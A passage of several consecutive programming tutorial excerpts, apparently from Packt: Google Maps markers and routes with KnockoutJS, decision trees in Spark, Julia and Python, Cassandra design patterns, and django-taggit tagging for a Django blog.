/* method to place a marker on the map */
var placeMarker = function (location, value) {
    // create and place marker on the map
    var marker = new google.maps.Marker({
        position: location,
        map: map
    });
    // store the newly created marker in the address model
    value().marker(marker);
};

Now, create a method that checks for an existing marker in the address model and removes it from the map. Name this method removeMarker. It should look similar to this:

/* method to remove old marker from the map */
var removeMarker = function(address) {
    if (address != null) {
        address.marker().setMap(null);
    }
};

The next step is to register subscribers that will trigger when an address changes. We will use these subscribers to trigger the removal of the existing markers. We will use the beforeChange event of the subscribers so that we have access to the existing markers in the model. Add subscribers to the fromAddress and toAddress observables to trigger on the beforeChange event, and remove the existing markers on the trigger. To achieve this, I created a method called registerSubscribers. This method is called from the init method of the module. The method registers the two subscribers that trigger calls to removeMarker. Our implementation looks similar to this:

/* method to register subscribers */
var registerSubscribers = function () {
    // fire before the from address is changed
    mapsModel.fromAddress.subscribe(function(oldValue) {
        removeMarker(oldValue);
    }, null, "beforeChange");

    // fire before the to address is changed
    mapsModel.toAddress.subscribe(function(oldValue) {
        removeMarker(oldValue);
    }, null, "beforeChange");
};

We are now ready to bring the methods we created together and place a marker on the map. Create a method called updateAddress. This method should take two parameters: the place object and the value binding. The method should call populateAddress to extract and populate the address model, and placeMarker to place a new marker on the map.
Our implementation looks similar to this:

/* method to update the address model */
var updateAddress = function(place, value) {
    populateAddress(place, value);
    placeMarker(place.geometry.location, value);
};

Call the updateAddress method from the event listener in the addressAutoComplete custom binding:

google.maps.event.addListener(autocomplete, 'place_changed', function() {
    var place = autocomplete.getPlace();
    console.log(place);
    updateAddress(place, value);
});

Open the application in your browser. Select the from and to addresses. You should now see markers appear for the two selected addresses. In our browser, the application looks similar to the following screenshot:

Displaying a route between the markers
The last feature of the application is to draw a route between the two address markers. To implement this feature, we will:
Create and initialize the directions service
Request routing information from the directions service and draw the route
Update the view to add a button to get directions

Let's get started by creating and initializing the directions service. We will use the google.maps.DirectionsService class to get the routing information and google.maps.DirectionsRenderer to draw the route on the map. Create two attributes in the MapsApplication module: one for the directions service and the other for the directions renderer:

/* the directions service */
var directionsService;

/* the directions renderer */
var directionsRenderer;

Next, create a method to create and initialize the preceding attributes:

/* initialise the direction service and display */
var initDirectionService = function () {
    directionsService = new google.maps.DirectionsService();
    directionsRenderer = new google.maps.DirectionsRenderer({suppressMarkers: true});
    directionsRenderer.setMap(map);
};

Call this method from the mapPanel custom binding handler after the map has been created and centered. The updated mapPanel custom binding should look similar to this:

/* custom binding handler for maps panel */
ko.bindingHandlers.mapPanel = {
    init: function(element, valueAccessor){
        map = new google.maps.Map(element, {
            zoom: 10
        });
        centerMap(localLocation);
        initDirectionService();
    }
};

The next step is to create a method that will build and fire a request to the directions service to fetch the direction information. The direction information will then be used by the directions renderer to draw the route on the map. Our implementation of this method looks similar to this:

/* method to get directions and display route */
var getDirections = function () {
    // create request for directions
    var routeRequest = {
        origin: mapsModel.fromAddress().location(),
        destination: mapsModel.toAddress().location(),
        travelMode: google.maps.TravelMode.DRIVING
    };

    // fire request to route based on request
    directionsService.route(routeRequest, function(response, status) {
        if (status == google.maps.DirectionsStatus.OK) {
            directionsRenderer.setDirections(response);
        } else {
            console.log("No directions returned ...");
        }
    });
};

We create a routing request in the first part of the method. The request object consists of origin, destination, and travelMode. The origin and destination values are set to the locations of the from and to addresses. The travelMode is set to google.maps.TravelMode.DRIVING, which, as the name suggests, specifies that we require a driving route. Add the getDirections method to the return statement of the module, as we will bind it to a button in the view.
One last step before we can work on the view is to clear the route on the map when the user selects a new address. This can be achieved by adding an instruction to clear the route information in the subscribers we registered earlier. Update the subscribers in the registerSubscribers method to clear the routes on the map:

/* method to register subscribers */
var registerSubscribers = function () {
    // fire before the from address is changed
    mapsModel.fromAddress.subscribe(function(oldValue) {
        removeMarker(oldValue);
        directionsRenderer.set('directions', null);
    }, null, "beforeChange");

    // fire before the to address is changed
    mapsModel.toAddress.subscribe(function(oldValue) {
        removeMarker(oldValue);
        directionsRenderer.set('directions', null);
    }, null, "beforeChange");
};

The last step is to update the view. Open the view and add a button under the address input components. Add a click binding to the button and bind it to the getDirections method of the module. Add an enable binding to make the button clickable only after the user has selected the two addresses. The button should look similar to this:

<button type="button" class="btn btn-default"
        data-bind="enable: MapsApplication.mapsModel.fromAddress && MapsApplication.mapsModel.toAddress,
                   click: MapsApplication.getDirections">
    Get Directions
</button>

Open the application in your browser and select the From address and To address options. The address details and markers should appear for the two selected addresses. Click on the Get Directions button. You should see the route drawn on the map between the two markers. In our browser, the application looks similar to the following screenshot:

Summary
In this article, we walked through placing markers on the map and displaying the route between the markers.

Resources for Article:
Further resources on this subject:
KnockoutJS Templates [article]
Components [article]
Web Application Testing [article]


Implementing Decision Trees

Packt
22 Sep 2015
4 min read
In this article by Sunila Gollapudi, author of the book Practical Machine Learning, we will outline a business problem that can be addressed by building a decision tree-based model, and see how it can be implemented in Apache Mahout, R, Julia, Apache Spark, and Python. (For more resources related to this topic, see here.)

Implementing decision trees
Here, we will explore implementing decision trees using various frameworks and tools.

The R example
We will use the rpart and ctree packages in R to build decision tree-based models:
Import the packages for data import and the decision tree libraries.
Start data manipulation: create a categorical variable on Sales and append it to the existing dataset.
Using random functions, split the data into training and testing datasets.
Fit the tree model with the training data, check how the model works with the testing data, and measure the error.
Prune the tree.
Plot the pruned tree.

The Spark example
A Java-based example using MLlib is shown here:

import java.util.HashMap;
import java.util.Map;

import scala.Tuple2;

import org.apache.spark.api.java.JavaPairRDD;
import org.apache.spark.api.java.JavaRDD;
import org.apache.spark.api.java.JavaSparkContext;
import org.apache.spark.api.java.function.Function;
import org.apache.spark.api.java.function.PairFunction;
import org.apache.spark.mllib.regression.LabeledPoint;
import org.apache.spark.mllib.tree.DecisionTree;
import org.apache.spark.mllib.tree.model.DecisionTreeModel;
import org.apache.spark.mllib.util.MLUtils;
import org.apache.spark.SparkConf;

SparkConf sparkConf = new SparkConf().setAppName("JavaDecisionTree");
JavaSparkContext sc = new JavaSparkContext(sparkConf);

// Load and parse the data file.
String datapath = "data/mllib/sales.txt";
JavaRDD<LabeledPoint> data = MLUtils.loadLibSVMFile(sc.sc(), datapath).toJavaRDD();

// Split the data into training and test sets (30% held out for testing)
JavaRDD<LabeledPoint>[] splits = data.randomSplit(new double[]{0.7, 0.3});
JavaRDD<LabeledPoint> trainingData = splits[0];
JavaRDD<LabeledPoint> testData = splits[1];

// Set parameters.
// Empty categoricalFeaturesInfo indicates all features are continuous.
Integer numClasses = 2;
Map<Integer, Integer> categoricalFeaturesInfo = new HashMap<Integer, Integer>();
String impurity = "gini";
Integer maxDepth = 5;
Integer maxBins = 32;

// Train a DecisionTree model for classification.
final DecisionTreeModel model = DecisionTree.trainClassifier(trainingData, numClasses,
    categoricalFeaturesInfo, impurity, maxDepth, maxBins);

// Evaluate model on test instances and compute test error
JavaPairRDD<Double, Double> predictionAndLabel =
    testData.mapToPair(new PairFunction<LabeledPoint, Double, Double>() {
        @Override
        public Tuple2<Double, Double> call(LabeledPoint p) {
            return new Tuple2<Double, Double>(model.predict(p.features()), p.label());
        }
    });

Double testErr = 1.0 * predictionAndLabel.filter(new Function<Tuple2<Double, Double>, Boolean>() {
    @Override
    public Boolean call(Tuple2<Double, Double> pl) {
        return !pl._1().equals(pl._2());
    }
}).count() / testData.count();

System.out.println("Test Error: " + testErr);
System.out.println("Learned classification tree model:\n" + model.toDebugString());

The Julia example
We will use the DecisionTree package in Julia, as shown here:

julia> Pkg.add("DecisionTree")
julia> using DecisionTree

We will use the RDatasets package to load the dataset for the example in context:

julia> Pkg.add("RDatasets"); using RDatasets
julia> sales = data("datasets", "sales");
julia> features = array(sales[:, 1:4]); # use matrix() for Julia v0.2
julia> labels = array(sales[:, 5]); # use vector() for Julia v0.2
julia> stump = build_stump(labels, features);
julia> print_tree(stump)
Feature 3, Threshold 3.0
L-> price : 50/50
R-> shelvelock : 50/100

Pruning the tree:

julia> length(tree)
11
julia> pruned = prune_tree(tree, 0.9);
julia> length(pruned)
9
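The article lists Python among the implementation options, but no Python listing is included in this excerpt. The following scikit-learn sketch is an illustrative stand-in rather than the book's own code: it uses a synthetic dataset in place of the sales data and mirrors the 70/30 split, Gini impurity, and maximum depth of 5 used in the Spark example above.

# A hedged Python sketch (not from the book): a decision tree classifier with
# scikit-learn on a synthetic dataset, mirroring the 70/30 split and the
# test-error computation used in the Spark example.
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, export_text

rng = np.random.RandomState(42)
X = rng.rand(500, 4)                      # four illustrative numeric features
y = (X[:, 2] > 0.5).astype(int)           # a binary "high sales" label

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)

model = DecisionTreeClassifier(criterion="gini", max_depth=5, random_state=42)
model.fit(X_train, y_train)

test_err = np.mean(model.predict(X_test) != y_test)
print("Test Error:", test_err)
print(export_text(model))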
Summary
In this article, we implemented decision trees using R, Spark, and Julia.

Resources for Article:
Further resources on this subject:
An overview of common machine learning tasks [article]
How to do Machine Learning with Python [article]
Modeling complex functions with artificial neural networks [article]

Cassandra Design Patterns

Packt
22 Sep 2015
18 min read
In this article, Rajanarayanan Thottuvaikkatumana, author of the book Cassandra Design Patterns, Second Edition, discusses how Apache Cassandra is one of the most popular NoSQL data stores. He states this based on the research paper Dynamo: Amazon's Highly Available Key-Value Store and the research paper Bigtable: A Distributed Storage System for Structured Data. Cassandra is implemented with the best features from both of these research papers. In general, NoSQL data stores can be classified into the following groups:
Key-value data store
Column family data store
Document data store
Graph data store
Cassandra belongs to the column family data store group. Cassandra's peer-to-peer architecture avoids single points of failure in the cluster of Cassandra nodes and gives the ability to distribute the nodes across racks or data centres. This makes Cassandra a linearly scalable data store. In other words, the more processing you need, the more Cassandra nodes you can add to your cluster. Cassandra's multi data centre support makes it a perfect choice to replicate the data stores across data centres for disaster recovery, high availability, separating transaction processing and analytical environments, and for building resiliency into the data store infrastructure.

Design patterns in Cassandra
The term "design patterns" is a highly misinterpreted term in the software development community. In an extremely general sense, it is a set of solutions for some known problems in quite a specific context. It is used in this book to describe a pattern of using certain features of Cassandra to solve some real-world problems. This book is a collection of such design patterns with real-world examples.

Coexistence patterns
Cassandra is one of the most successful NoSQL data stores, and it is greatly similar to the traditional RDBMS. Cassandra column families (also known as Cassandra tables), from a logical perspective, have a similarity with RDBMS-based tables in the view of the users, even though the underlying structures of these tables are totally different. Because of this, Cassandra is a good fit to be deployed along with the traditional RDBMS to solve some of the problems that the RDBMS is not able to handle. The caveat here is that, because of the similarity of RDBMS tables and Cassandra column families in the view of the end users, many users and data modelers try to use Cassandra in exactly the same way as the RDBMS schema is modeled and used, and get into serious deployment issues. How do you prevent such pitfalls? The key here is to understand the differences from a theoretical perspective as well as a practical perspective, and to follow the best practices prescribed by the creators of Cassandra.

Where do you start with Cassandra? The best place to look is the new application development requirements, and take it from there. Look at the cases where there is a need to de-normalize the RDBMS tables and keep all the data items together, which would have got distributed if you were to design the same solution in RDBMS. Instead of thinking from the pure data model perspective, start thinking in terms of the application's perspective: how the data is generated by the application, what the read requirements are, what the write requirements are, what response time is expected out of some of the use cases, and so on. Depending on these aspects, design the data model.
In the big data world, the application becomes the first-class citizen and the data model leaves the driving seat in the application design. Design the data model to serve the needs of the applications.

In any organization, new reporting requirements come up all the time. The major challenge in generating reports is the underlying data store. In the RDBMS world, reporting is always a challenge. You may have to join multiple tables to generate even simple reports. Even though RDBMS objects such as views, stored procedures, and indexes may be used to get the desired data for the reports, when the report is being generated, the query plan is going to be very complex most of the time. The consumption of processing power is another thing to consider when generating such reports on the fly. Because of these complexities, it is common to keep separate tables containing data exported from the transactional tables for reporting requirements. This is a great opportunity to start with NoSQL stores like Cassandra as a reporting data store.

Data aggregation and summarization are common requirements in any organization. This helps to control the data growth by storing only the summary statistics and moving the transactional data into archives. Many times, this aggregated and summarized data is used for statistical analysis. Making the summary accurate and easily accessible is a big challenge. Most of the time, data aggregation and reporting go hand in hand. The aggregated data is heavily used in reports. The aggregation process speeds up the queries to a great extent. This is another place where you can start with NoSQL stores like Cassandra.

The coexistence of RDBMS and NoSQL data stores like Cassandra is very much possible, feasible, and sensible; and this is the only way to get started with the NoSQL movement, unless you embark on a totally new product development from scratch. In summary, this section of the book discusses some design patterns related to de-normalization, reporting, and aggregation of data using Cassandra as the preferred NoSQL data store.

RDBMS migration patterns
A big bang approach to any kind of technology migration is not advisable. A series of deliberations have to happen before the eventual and complete changeover. Migration from RDBMS to Cassandra is no different. Any new technology replacing an old one must coexist harmoniously, at least for a short period of time. This gives the stakeholders a lot of confidence in the new technology. Many technology pundits give various approaches to RDBMS to NoSQL migration strategies. Many such guidelines are specific to particular NoSQL data stores, giving attention to specific areas, and most of the time they end up focusing on the process rather than the technology. The migration from RDBMS to Cassandra is not an easy task, mainly because RDBMS-based systems are really time tested and trustworthy in most organizations. So, migrating from such a robust RDBMS-based system to Cassandra is not going to be easy for anyone. One of the best approaches to achieve this goal is to exploit some of the new or unique features in Cassandra that many traditional RDBMS don't have. This also prevents the usage of Cassandra just like any other RDBMS. Cassandra is unique. Cassandra is not an RDBMS. The approach of banking on the unique features is not only applicable to the RDBMS to Cassandra migration, but also to any migration from one paradigm to another.
Some of the design patterns that are discussed in this section of the book revolve around very simple and important features of Cassandra, but they have profound application potential when designing the next generation of NoSQL data stores using Cassandra. A wise usage of these unique features in Cassandra will give a head start on the eventual and complete migration from RDBMS.

The modeling of collection objects in RDBMS is a real pain, because multiple tables are to be defined and a join is required to access the data. Many RDBMS offer this by providing the capability to define user-defined data types, but there is absolutely no standardization at all in this space. Collection objects are very commonly seen in real-world applications. A list of actions, a tuple of related values, a set of objects, dictionaries, and things like that come up quite often in applications. Cassandra has elegant ways to model this, because they are data types in column families.

Counting is a very commonly required process in many business processes and applications. In RDBMS, this has to be modeled as integers or long numbers, but many times applications make big mistakes in using them in wrong ways. Cassandra has a counter data type in the column family that alleviates this problem.

Getting rid of unwanted records from an RDBMS table is not an automatic process. When some application events occur, they have to be removed by application programs or through some other means. But in many situations, many data items will have a preallocated time to live. They should go away without the intervention of any external events. Cassandra has a way to assign a time-to-live (TTL) attribute to data items. By making use of TTL, data items get removed without any other external event's intervention.

All the design patterns covered in this section of the book revolve around some of the new features of Cassandra that will make the migration from RDBMS to Cassandra an easy task.
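To make the collection, counter, and TTL features concrete, here is a minimal sketch using the DataStax Python driver (cassandra-driver). It is illustrative only; the keyspace, table, and column names are assumptions and do not come from the book.

# A minimal sketch using the DataStax Python driver (pip install cassandra-driver).
# The keyspace and table names here are illustrative assumptions, not book schema.
from cassandra.cluster import Cluster

cluster = Cluster(['127.0.0.1'])
session = cluster.connect()

session.execute("""
    CREATE KEYSPACE IF NOT EXISTS demo
    WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1}
""")

# A set collection models multi-valued data without a separate join table
session.execute("""
    CREATE TABLE IF NOT EXISTS demo.user_profile (
        user_id text PRIMARY KEY,
        emails  set<text>
    )
""")

# A counter column models counting without application-side arithmetic
session.execute("""
    CREATE TABLE IF NOT EXISTS demo.page_hits (
        page text PRIMARY KEY,
        hits counter
    )
""")
session.execute("UPDATE demo.page_hits SET hits = hits + 1 WHERE page = 'home'")

# TTL lets a row expire on its own; this one disappears after 24 hours
session.execute(
    "INSERT INTO demo.user_profile (user_id, emails) VALUES (%s, %s) USING TTL 86400",
    ('alice', {'alice@example.com'})
)

cluster.shutdown()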
Cache migration pattern
Database access, whether it is from RDBMS or other highly distributed NoSQL data stores, is always an input/output (I/O) intensive operation. It makes perfect sense to cache the frequently used, but reasonably static, data for fast access by the applications consuming this data. In such situations, an in-memory cache is preferred to repeated database access for each request. Using a cache is not always a pleasant experience. Getting into really weird problems such as data loss, data getting out of sync with its source, and other data integrity problems is very common.

It is very common to see wrong components coming into the enterprise solution stack all the time, for various reasons. Overlooking some of the features and adopting a technology without much background work is a very common pitfall. Many a time, a cache comes into the solution stack to reduce the latency of the responses. Once the initial results are favorable, more and more data gets tossed into the cache. Slowly, it becomes a practice to see more and more data getting into the cache. Now is the time when problems start popping up one by one. Pure in-memory cache solutions are favored by everybody, by virtue of their ability to serve data quickly, until you start losing data because of faults in the system, along with application and node crashes. A cache serves data much faster than it can be served from other data stores. But if the caching solution in use is giving data integrity problems, it is better to migrate to NoSQL data stores like Cassandra. Is Cassandra faster than the in-memory caching solutions? The obvious answer is no. But it is not as bad as many think. Cassandra can be configured to serve fast reads, and the bonus comes in the form of high data integrity with strong replication capabilities. A cache is good as long as it serves its purpose without any data loss or any other data integrity issues. This section of the book emphasizes the use case of the key/value type cache and discusses various methods of cache to NoSQL migration. Cassandra cannot be used as a replacement for a cache in terms of the speed of data access. But when it comes to data integrity, Cassandra shines all the time with its tuneable consistency feature. With continual tuning and by manipulating data with clean and well-written application code, data access can be improved to a great level, and it will be much better than many other data stores. The design pattern covered in this section of the book gives some guidance on migrating from caching solutions to Cassandra, if this is a must.

CAP patterns
When it comes to large-scale Internet applications or web services, popularly known as Internet of Things (IoT) applications, the number of components is huge and the way they are distributed is beyond imagination. There will be hundreds of application servers, hundreds of data store nodes, and many other components in the whole ecosystem. In such a scenario, doing an atomic transaction by getting an agreement from all the components involved is, for all practical purposes, impossible. Consistency, availability, and partition tolerance are three important guarantees, popularly known as the CAP guarantees, that any distributed computing system should offer, even though all three are not possible simultaneously. In IoT applications, the distribution of the application nodes is unavoidable. This means that the possibility of network partition is pretty much there. So, it is mandatory to give the P guarantee. Now, the question is whether to forfeit the C guarantee or the A guarantee. At this stage, the situation is not as grave as portrayed in the CAP theorem conjectured by Eric Brewer. For all the use cases in a given IoT application, there is no need to have 100% of the C guarantee and 100% of the A guarantee. So, depending on the level of the A guarantee needed, the C guarantee can be tuned. In other words, this is called tunable consistency. Depending on the way data is ingested into Cassandra, and the way it is consumed from Cassandra, tuning is possible to give the best results for the appropriate read and write requirements of the applications.

In some applications, the speed at which the data is written will be very high. In other words, the velocity of the data ingestion into Cassandra is very high. These fall into the write-heavy applications. In some applications, the need to read data quickly will be an important requirement. This is mainly needed in applications where there is a lot of data processing required. Data analytics applications, batch processing applications, and so on fall under this category. These fall into the read-heavy applications. Now, there is a third category of applications where there is equal importance for fast writes as well as fast reads. These are the kind of applications where there is a constant inflow of data, and at the same time, there is a need for clients to read the data for various purposes. These fall into the read-write balanced applications.

The consistency level requirements for all the previous three types of applications are totally different. There is no one way to tune so that it is optimal for all three types of applications. The consistency levels of all three application types are to be tuned differently, from use case to use case. In this section of the book, various design patterns related to applications with the needs of fast writes, fast reads, and moderate writes and reads are discussed. All these design patterns revolve around using the tuneable consistency parameters of Cassandra. Whether it is for writes or reads, if the consistency levels are set high, the availability levels will be low, and vice versa. So, by making use of the consistency level knob, the Cassandra data store can be used for various types of writing and reading use cases.
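As a concrete illustration of the consistency level knob, the following sketch (again with the DataStax Python driver) issues a write at a low consistency level for a write-heavy path and a read at QUORUM where stronger guarantees are needed. The events table and keyspace are assumptions for illustration, not code from the book.

# Illustrative only: assumes a keyspace 'demo' and a table
# events (id text PRIMARY KEY, payload text) already exist.
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement

session = Cluster(['127.0.0.1']).connect('demo')

# Write-heavy path: favour availability with a low consistency level
fast_write = SimpleStatement(
    "INSERT INTO events (id, payload) VALUES (%s, %s)",
    consistency_level=ConsistencyLevel.ONE)
session.execute(fast_write, ('evt-1', 'sensor reading'))

# Read path that needs stronger guarantees: pay for it with QUORUM
strong_read = SimpleStatement(
    "SELECT payload FROM events WHERE id = %s",
    consistency_level=ConsistencyLevel.QUORUM)
row = session.execute(strong_read, ('evt-1',)).one()
print(row.payload)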
Temporal patterns
In any application, the usage of data that varies over a period of time, called temporal data, is very important. Temporal data is needed wherever there is a need to maintain chronology. There are so many applications in which there is a huge need for the storage, retrieval, and processing of data that is tied to time. The biggest challenge in dealing with temporal data stored in a data store is that it is hugely used for analytical purposes and for retrieving the data based on various sort orders in terms of time. So, the data stores that are used to capture the temporal data should be capable of storing the data strictly adhering to the chronology.

There are many usage patterns seen in the real world that show temporal behavior. For classification purposes in this book, they are bucketed into three categories. The first one is the general time series category. The second one is the log category, such as an audit log, a transaction log, and so on. The third one is the conversation category, such as the conversation messages of a chat application. There is relevance in this classification, because these are commonly used across many applications. In many applications, these are really cross-cutting concerns; designers underestimate this aspect; and finally, many applications end up with different data stores capturing this temporal data. There is a need for a common strategy for dealing with temporal data that falls into these three commonly seen categories in an enterprise-wide solution architecture. In other words, there should be a uniform way of capturing temporal data, there should be a uniform way of processing temporal data, and there should be a commonly used set of tools and libraries to manage the temporal data.

Out of the three design patterns that are discussed in this section of the book, the first, the Time Series pattern, is a general design pattern that covers the most general behavior of any kind of temporal data. The next two design patterns, namely the Log pattern and the Conversation pattern, are two special cases of the first design pattern. This section of the book covers the general nature of temporal data, some specific instances of such data items in real-world applications, and why Cassandra is the best fit as a NoSQL data store to persist temporal data. Temporal data comes up quite often in many use cases of lots of applications. Data modeling of temporal data is very important from the Cassandra perspective for optimal storage and quick access of the data. Some common design patterns to model temporal data have been covered in this section of the book. By focusing on a very few aspects, such as the partition key, primary key, clustering column, and the number of records that get stored in a wide row of Cassandra, very effective and high-performing temporal data models can be built.
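A minimal sketch of those modeling decisions (partition key and clustering column) is shown below, again with the Python driver; the table layout and names are illustrative assumptions, not the book's schema.

# Illustrative time-series table: one partition per sensor per day,
# rows clustered by time in descending order. Names are assumptions.
from cassandra.cluster import Cluster

session = Cluster(['127.0.0.1']).connect('demo')

session.execute("""
    CREATE TABLE IF NOT EXISTS sensor_readings (
        sensor_id text,
        day       text,
        ts        timestamp,
        value     double,
        PRIMARY KEY ((sensor_id, day), ts)
    ) WITH CLUSTERING ORDER BY (ts DESC)
""")

# Latest 10 readings for one sensor on one day, served from a single partition
rows = session.execute(
    "SELECT ts, value FROM sensor_readings "
    "WHERE sensor_id = %s AND day = %s LIMIT 10",
    ('meter-42', '2015-09-22'))
for row in rows:
    print(row.ts, row.value)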
Analytical patterns
The 3Vs of big data, namely Volume, Variety, and Velocity, pose another big challenge, which is the analysis of the data stored in NoSQL data stores such as Cassandra. What are the analytics use cases? How can the distributed data be processed? What are the data transformations that are typically seen in applications? These are the topics covered in this section of the book. Unlike the other sections of this book, the focus is shifted from Cassandra to other technologies like Apache Hadoop, Hadoop MapReduce, and Apache Spark to introduce the big data analytics tool space. Design patterns such as the Map/Reduce Pattern and the Transformation Pattern are very commonly seen in the data analytics world. Cassandra has good compatibility with Apache Spark, and together they are a very ideal tool set for data analysis use cases.

This section of the book covers some data analysis aspects and mainly discusses data processing. Data transformation is one of the major activities in data processing. Out of the many data processing patterns, the Map/Reduce Pattern deserves a special mention, because it is being used in so many batch processing and analysis use cases dealing with big data. Spark has been chosen as the tool of choice to explain the data processing activities. This section explains how a Map/Reduce kind of data processing task can be done using Cassandra. Spark, which is very powerful for performing online data analysis, has also been discussed. This section of the book also covers some of the commonly seen data transformations that are used in data processing applications.

Summary
Many Cassandra design patterns have been covered in this book. If a design pattern is not being used in any real-world application, it has only theoretical value. To give a practical approach to the applicability of these design patterns, an end-to-end application is taken as a case in point and described in the last chapter of the book, which is used as a vehicle to explain the applicability of the Cassandra design patterns discussed in the earlier sections of the book.

Users love Cassandra because of its SQL-like interface, CQL. Also, its features are very closely related to the RDBMS, even though the paradigm is totally new. Application developers love Cassandra because of the plethora of drivers available in the market, so that they can write applications in their preferred programming language. Architects love Cassandra because they can store structured, semi-structured, and unstructured data in it. Database administrators love Cassandra because it comes with almost no maintenance overhead. Service managers love Cassandra because of the wonderful monitoring tools available in the market. CIOs love Cassandra because it gives value for their money. And Cassandra works! An application based on Cassandra will be perfect only if its features are used in the right way, and this book is an attempt to guide the Cassandra community in this direction.
Resources for Article: Further resources on this subject: Cassandra Architecture [article] Getting Up and Running with Cassandra [article] Getting Started with Apache Cassandra [article]


Enhancing Your Blog with Advanced Features

Packt
22 Sep 2015
8 min read
In this article, Antonio Melé, the author of the Django by Example book, shows how to use Django forms and ModelForms. You will let your users share posts by e-mail, and you will be able to extend your blog application with a comment system. You will also learn how to integrate third-party applications into your project, and build complex QuerySets to get useful information from your models. In this article, you will learn how to add tagging functionality using a third-party application. (For more resources related to this topic, see here.)

Adding tagging functionality
After implementing our comment system, we are going to create a system for adding tags to our posts. We are going to do this by integrating a third-party Django tagging application into our project. django-taggit is a reusable application that primarily offers you a Tag model and a manager for easily adding tags to any model. You can take a look at its source code at https://github.com/alex/django-taggit.

First, you need to install django-taggit via pip by running the pip install django-taggit command. Then, open the settings.py file of the project and add taggit to your INSTALLED_APPS setting, as follows:

INSTALLED_APPS = (
    # ...
    'mysite.blog',
    'taggit',
)

Then, open the models.py file of your blog application and add the TaggableManager manager provided by django-taggit to the Post model, as follows:

from taggit.managers import TaggableManager

# ...

class Post(models.Model):
    # ...
    tags = TaggableManager()

You just added tags to this model. The tags manager will allow you to add, retrieve, and remove tags from Post objects. Run the python manage.py makemigrations blog command to create a migration for your model changes. You will get the following output:

Migrations for 'blog':
  0003_post_tags.py:
    - Add field tags to post

Now, run the python manage.py migrate command to create the required database tables for the django-taggit models and synchronize your model changes. You will see an output indicating that the migrations have been applied:

Operations to perform:
  Apply all migrations: taggit, admin, blog, contenttypes, sessions, auth
Running migrations:
  Applying taggit.0001_initial... OK
  Applying blog.0003_post_tags... OK

Your database is now ready to use the django-taggit models. Open the terminal with the python manage.py shell command and learn how to use the tags manager. First, we retrieve one of our posts (the one with the ID of 1):

>>> from mysite.blog.models import Post
>>> post = Post.objects.get(id=1)

Then, add some tags to it and retrieve its tags back to check that they were successfully added:

>>> post.tags.add('music', 'jazz', 'django')
>>> post.tags.all()
[<Tag: jazz>, <Tag: django>, <Tag: music>]

Finally, remove a tag and check the list of tags again:

>>> post.tags.remove('django')
>>> post.tags.all()
[<Tag: jazz>, <Tag: music>]

This was easy, right? Run the python manage.py runserver command to start the development server again, and open http://127.0.0.1:8000/admin/taggit/tag/ in your browser. You will see the admin page with the list of the Tag objects of the taggit application. Navigate to http://127.0.0.1:8000/admin/blog/post/ and click on a post to edit it. You will see that the posts now include a new Tags field, where you can easily edit tags. Now, we are going to edit our blog posts to display the tags.
Open the blog/post/list.html template and add the following HTML code below the post title:

<p class="tags">Tags: {{ post.tags.all|join:", " }}</p>

The join template filter works like the Python string join method, concatenating elements with the given string. Open http://127.0.0.1:8000/blog/ in your browser. You will see the list of tags under each post title.

Now, we are going to edit our post_list view to let users see all posts tagged with a given tag. Open the views.py file of your blog application, import the Tag model from django-taggit, and change the post_list view to optionally filter posts by tag, as follows:

from taggit.models import Tag

def post_list(request, tag_slug=None):
    post_list = Post.published.all()
    if tag_slug:
        tag = get_object_or_404(Tag, slug=tag_slug)
        post_list = post_list.filter(tags__in=[tag])
    # ...

The view now takes an optional tag_slug parameter that has a None default value. This parameter will come in the URL. Inside the view, we build the initial QuerySet, retrieving all the published posts. If there is a given tag slug, we get the Tag object with the given slug using the get_object_or_404 shortcut. Then, we filter the list of posts down to the ones whose tags are contained in a given list composed only of the tag we are interested in. Remember that QuerySets are lazy. The QuerySet for retrieving posts will only be evaluated when we loop over the post list to render the template.

Now, change the render function at the bottom of the view to pass all the local variables to the template using locals(). The view will finally look as follows:

def post_list(request, tag_slug=None):
    post_list = Post.published.all()
    if tag_slug:
        tag = get_object_or_404(Tag, slug=tag_slug)
        post_list = post_list.filter(tags__in=[tag])
    paginator = Paginator(post_list, 3)  # 3 posts in each page
    page = request.GET.get('page')
    try:
        posts = paginator.page(page)
    except PageNotAnInteger:
        # If page is not an integer deliver the first page
        posts = paginator.page(1)
    except EmptyPage:
        # If page is out of range deliver last page of results
        posts = paginator.page(paginator.num_pages)
    return render(request, 'blog/post/list.html', locals())

Now, open the urls.py file of your blog application and make sure you are using the following URL pattern for the post_list view:

url(r'^$', post_list, name='post_list'),

Now, add another URL pattern, as follows, for listing posts by tag:

url(r'^tag/(?P<tag_slug>[-\w]+)/$', post_list, name='post_list_by_tag'),

As you can see, both patterns point to the same view, but we are naming them differently. The first pattern will call the post_list view without any optional parameters, whereas the second pattern will call the view with the tag_slug parameter. Let's change our post list template to display posts tagged with a specific tag, and also link the tags to the list of posts filtered by that tag. Open blog/post/list.html and add the following lines before the for loop of posts:

{% if tag %}
    <h2>Posts tagged with "{{ tag.name }}"</h2>
{% endif %}

If the user is accessing the blog, he will see the list of all posts. If he is filtering by posts tagged with a specific tag, he will see this information.
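As an optional sanity check (not a step from the book), you can exercise the same filtering QuerySet from the Django shell, using the jazz tag added earlier, before wiring up the links in the template:

>>> from taggit.models import Tag
>>> from mysite.blog.models import Post
>>> tag = Tag.objects.get(slug='jazz')
>>> Post.published.filter(tags__in=[tag])

You should see the post you tagged earlier in the resulting QuerySet.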
Now, change the way the tags are displayed to the following:

<p class="tags">
    Tags:
    {% for tag in post.tags.all %}
        <a href="{% url "blog:post_list_by_tag" tag.slug %}">{{ tag.name }}</a>
        {% if not forloop.last %}, {% endif %}
    {% endfor %}
</p>

Notice that now we are looping through all the tags of a post and displaying a custom link to the URL for listing posts tagged with this tag. We build the link with {% url "blog:post_list_by_tag" tag.slug %}, using the name that we gave to the URL and the tag slug as a parameter. We separate the tags with commas. The complete code of your template will look like the following:

{% extends "blog/base.html" %}

{% block title %}My Blog{% endblock %}

{% block content %}
    <h1>My Blog</h1>
    {% if tag %}
        <h2>Posts tagged with "{{ tag.name }}"</h2>
    {% endif %}
    {% for post in posts %}
        <h2><a href="{{ post.get_absolute_url }}">{{ post.title }}</a></h2>
        <p class="tags">
            Tags:
            {% for tag in post.tags.all %}
                <a href="{% url "blog:post_list_by_tag" tag.slug %}">{{ tag.name }}</a>
                {% if not forloop.last %}, {% endif %}
            {% endfor %}
        </p>
